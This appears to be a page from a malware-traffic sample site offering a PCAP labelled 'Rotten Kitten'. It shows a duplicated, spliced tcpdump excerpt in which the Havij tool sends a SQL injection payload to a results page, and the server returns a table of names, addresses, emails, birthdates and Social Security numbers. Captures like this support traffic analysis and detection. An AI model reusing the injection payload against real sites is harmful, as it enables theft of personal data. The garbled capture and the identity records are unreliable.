Text Example

Rotten Kitten APT/Malware PCAP Download File Traffic Sample

Download Attachments

  • 1 pcap 21
    Date added: May 24, 2019 12:02 am Added by: admin File size: 5 MB Downloads: 34

References:

https://www.hybrid-analysis.com/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=1
http://securitywarrior.ca/index.php/2015/11/09/rocket-kitten-a-campaign-with-9-lives/

2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij

2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0
E..(..@.@.yR…|T..7.P.. }…E..P….P……..
2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST
E..A.......T..7.........LVG..@......... EGEBECEMEFFECACACACACACACACACAAA.. ..... ........….w
2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK
E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK
Date: Sat, 23 Apr 2016 18:02:43 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.16
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

2039
84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…F…>

References: https://www.hybrid-analysis.com/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=1
Rocket Kitten: A campaign with 9 lives
2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 Connection: close Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US, en;q=0.5 Host: www.allsafesec.com Referer: http://www.allsafesec.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij 2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0 E..(..@.@.yR…|T..7.P.. }…E..P….P…….. 2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST E..`A…….T..7………LVG..@……… EGEBECEMEFFECACACACACACACACACAAA.. ….. ……..`….w 2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK Date: Sat, 23 Apr 2016 18:02:43 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.16 Connection: close Transfer-Encoding: chunked Content-Type: text/html 2039 84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…F…>
E-mailTitleFirst NameLast NameStreet AddressCityStateBirthdaySocial Security Number
Mr.RaymundoLawrence2315 Cimmaron RoadGarden GroveCARaymundoRLawrence@jourrapide.com2/7/1965610-46-2192
Mr.MikeClifton4217 Monroe StreetHoustonTXMikeGClifton@fleckens.hu1/22/1947461-14-0824
Mr.AntonCook1642 Stonepot RoadOldwickNJAntonCCook@dayrep.com1/16/1956144-15-2105
Mr.KevinHeint 2016-04-23 14:02:38.183557 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 961:1921, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P….]..zelman2461 Still Pastures DriveChesterSCKevinEHeintzelman@rhyta.com10/30/1982655-14-8336
Ms.VioletteWilliams4104 Taylor StreetHarrisonNYVioletteAWilliams@einrot.com1/28/1963131-74-3821
Ms.RosaRichardson2147 College StreetAtlantaGARosaRRichardson@jourrapide.com9/25/1964258-69-7618
Mr.DonaldFlanery3189 Valley StreetCamdenNJDonaldCFlanery@einrot.com6/27/1957148-28-3332
Ms.CarmellaGodwin1686 Vine StreetHickory HillsILCarmellaAGodwin@teleworm.us3/14/1968325-92-0303
Mrs.LoreneCulbertson3195 Single Street 84.11.146.55.1475: Flags [.], seq 1921:2881, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…+ ..d>KingstonMALoreneWCulbertson@fleckens.hu10/25/1983010-70-3813
Mr.MarcelBing2533 Stoneybrook RoadCocoaFLMarcelMBing@cuvox.de12/5/1984767-26-2410
Mr.AndrewKinne1919 Eden DriveRichmondVAAndrewDKinne@fleckens.hu1/8/1975228-04-3976
Mr.AlexHensley2621 Tree Top LaneNew TripoliPAAlexVHensley@einrot.com3/2/1956178-64-8921
Dr.MarisolMoore1351 Elk City RoadShreveportLAMarisolWMoore@gustr.com12/14/1973437-57-3234
Ms.BrendaClark504 Roosevelt StreetSan FranciscoCABrendaDClark@fleckens.hu11/16 2016-04-23 14:02:38.183563 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 2881:3841, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }.A.E..P….F../1988620-68-6663
Mr.HerschelMelton3752 Arbutus DriveDoralFLHerschelMMelton@jourrapide.com1/4/1952592-73-6015
Mrs.GenieMills750 Diane StreetOxnardCAGenieRMills@rhyta.com3/30/1965602-86-5292
Ms.MildredRusso3804 Kennedy CourtWalpoleMAMildredARusso@gustr.com5/1/1950024-82-9132
Ms.TashaWilliamson4716 Single StreetMaldenMATashaDWilliamson@fleckens.hu1/20/1988025-72-0119
Mrs.MelonieAsher4190 Seth StreetAbileneTXMelonieHAsher@gustr.com8/4/1984450-35-0282
Mrs.SallyPernell664 Pearl StreetSacramentoCASallyLPernell@gustr.com8/4/1949568-96-4747
Ms.CristinaStrock3368 Havanna StreetGreensboroNCCristinaCStrock@fleckens.hu11/4/1966246-63-4007
Ms.MaryGlenn4103 Haven LanePerryMIMaryCGlenn@dayrep.com5/30/1978362-40-9856
Mr.FredMurray659 Brooke StreetHoustonTXFredCMurray@superrito.com9/25/1954635-26-2048
Mrs.CindyChandler3631 Star Trek DrivePort St JoeFLCindyCChandler@teleworm.us2/1/1966591-84-6502
Mrs.AngelaSavage464 Oak DriveSchenectadyNYAngelaASavage@sup 2016-04-23 14:02:38.183571 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 4801:5761, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…….errito.com12/5/1989095-32-6531
Ms.MariaRios2070 Everette AlleyFt LauderdaleFLMariaERios@fleckens.hu5/4/1961263-80-1338
Mr.JesseTerry1057 Shady Pines DriveMadisonvilleKYJesseCTerry@dayrep.com9/23/1976406-55-8135
Mrs.RheaBrown3112 Thompson StreetLos AngelesCARheaCBrown@gustr.com3/18/1968556-56-2402
Mr.KevinParsons3453 Elliott StreetManchesterNHKevinJParsons@gustr.com4/3/1986002-76-7546
Mr.MarcosDimarco4032 South StreetPecosTXMarcosCDimarco@teleworm.us7/27/1960636-05-4711
Mr. 192.168.1.124.80: Flags [.], ack 5761, win 258, length 0 E..(‘.@…*.T..7…|…P.E.. ~..P…pm.. 2016-04-23 14:05:12.626767 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 3841, win 210, length 0 E..(.k@.@……|T..7.P.?.#<..p..P...|......... 2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 4801, win 225, length 0 E..(.l@.@……|T..7.P.?.#<..p..P...xL........ 2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 5761, win 240, length 0 E..(.m@.@……|T..7.P.?.#<..p.VP...t}........ 2016-04-23 14:05:12.626838 IP 84.11.146.55.1599 > 192.168.1.124.80: Flags [.], seq 5761:6721, ack 1, win 258, length 960: HTTP

Leave a Reply